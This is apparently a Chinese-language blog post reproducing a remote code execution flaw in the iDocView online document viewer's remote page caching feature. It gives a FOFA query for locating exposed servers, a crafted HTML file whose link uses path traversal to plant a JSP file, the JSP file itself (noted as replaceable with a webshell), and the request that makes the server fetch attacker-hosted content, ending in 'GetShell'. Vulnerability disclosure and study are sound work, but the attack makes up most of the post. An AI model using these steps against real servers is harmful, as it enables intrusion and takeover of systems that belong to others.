Babing
Published on 2024-08-30 / 0 Visits
0
0

I4-3IDocView-在线文档解析应用-RCE

I4-3IDocView-在线文档解析应用-RCE

漏洞描述:

本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。

利用特征
攻击者利用该漏洞的关键在于使用具有远程页面缓存功能的接口,在参数中填写预先准备的包含恶意文件的URL。此类请求能够绕过正常的安全检查,使得服务器下载并处理恶意内容。漏洞的触发会返回特定的响应状态和内容类型条件,攻击者可通过自动化脚本进行检测和利用。

漏洞影响
该漏洞的利用可能导致服务器被远程控制、敏感数据泄露等等。漏洞的存在不仅威胁到该应用服务器的安全性,还可能成为更广泛网络安全事件的触发点。建议受影响的用户尽快采取必要的安全措施,以防范潜在的安全风险。

影响版本:

iDocView < 13.10.1_20231115  

网站图片:

image-20240621143142888

网络测绘:

fofa语法:

FOFA:title==“在线文档预览 - I Doc View”

漏洞复现:

VPS上构造一个携带恶意link[href]的html文件,里面的link指向你的恶意文件
构造index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>
</head>
<body>
  <link href="/..\..\..\docview\test.jsp">
</body>
</html>

构造恶意文件

vi '..\..\..\docview\test.jsp'


<%out.print("test");%>      #可以是马子

python开启一个http服务器,发送请求

http://your-ip/html/2word?url=http://VPSip/index.html


当两个请求都响应200时会下载一个word文件,表示利用成功
验证

GetShell


Comment